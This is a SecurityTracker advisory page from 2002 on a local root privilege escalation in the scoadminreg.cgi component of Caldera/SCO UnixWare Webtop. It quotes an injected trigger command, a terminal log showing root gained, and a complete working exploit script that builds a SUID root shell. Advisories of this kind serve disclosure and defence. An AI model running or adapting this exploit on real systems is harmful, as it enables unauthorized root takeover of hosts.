SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Scoadminreg (Webtop) Vendors:   Caldera/SCO
Caldera 'scoadminreg.cgi' Component of UnixWare Webtop Lets Local Users Execute Arbitrary Code with Root Privileges to Gain Root Access
SecurityTracker Alert ID:  1003329
SecurityTracker URL:  http://securitytracker.com/id/1003329
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 23 2002
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  

Description:   A vulnerability was reported in the scoadminreg.cgi component of the Caldera/SCO UnixWare Webtop application. A local user can obtain root level privileges on the system.

A local user can execute the scoadminreg utility with a '-c' command line switch and user-supplied program to cause a SCOadmin object registration error. It is reported that the user-supplied program can then be executed with effective root privileges.

According to the report, the following command will trigger the vulnerability (where '/tmp/jggm' is a program that will create a root-owned shell):

/opt/webtop/bin/i3un0212/cgi-bin/admin/scoadminreg.cgi -c /tmp/jggm;/tmp/jggm;

A demonstration exploit script is provided in the Source Message.

Impact:   A local user can cause arbitrary code to be executed with root privileges on the host.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.caldera.com/ (Links to External Site)
Cause:   Access control error, Exception handling error, State error
Underlying OS:  UNIX (Open UNIX-SCO)
Underlying OS Comments:  UnixWare 7.1.1

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Issues Fix) Re: Caldera 'scoadminreg.cgi' Component of UnixWare Webtop Lets Local Users Execute Arbitrary Code with Root Privileges to Gain Root Access
The vendor has issued a fix.



 Source Message Contents

Subject:  Unixware 7.1.1 scoadminreg.cgi local exploit




unixware:~> uname -a
UnixWare unixware 5 7.1.1 i386 x86at SCO 
UNIX_SVR5
unixware:~> id
uid=101(mearee) gid=1(other)
unixware:~> ./scoadminreg.sh 

jGgM root exploit
http://www.netemperor.com/

Mail: jggm@mail.com

Manager: -c /tmp/jggm;/tmp/jggm;
ERROR: Cannot find a Webtop object associated 
with -c /tmp/jggm
ERROR: Could not add object  ()
RESULT: Error: Object ".../_ens/Org" already exists.
Location: /webtop/webtops/en_US/admin/scoadminre
gError.html

Success...
# id
uid=101(mearee) gid=1(other) euid=0(root)
# 

It can remote attack...maybe... :))

-----------------------------------------------
Korean Security Forum.
http://www.forsecure.com
http://www.netemperor.com
-----------------------------------------------

Here is file...

--------------------------------------------------------------
#!/bin/sh

CC="gcc"
SCOADMIN=/opt/webtop/bin/i3un0212/cgi-
bin/admin/scoadminreg.cgi

#
#
#
#

echo
echo "jGgM root exploit"
echo "http://www.netemperor.com/"
echo
echo "Mail: jggm@mail.com"
echo

if [ ! -x $SCOADMIN ]; then
   echo "$SCOADMIN file not found"
   exit 2;
fi

cat >/tmp/jggm.c <<_EOF

main()
{
   setuid(0);
   setgid(0);
   chown("/tmp/jGgM_Shell", 0, 0);
   chmod("/tmp/jGgM_Shell", 04755);
}
_EOF

cp /bin/ksh /tmp/jGgM_Shell
$CC -o /tmp/jggm /tmp/jggm.c

$SCOADMIN "-c /tmp/jggm;/tmp/jggm;"

rm -rf /tmp/jggm /tmp/jggm.c

/tmp/jGgM_Shell

# end of file..
-----------------------------------------------------------------

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC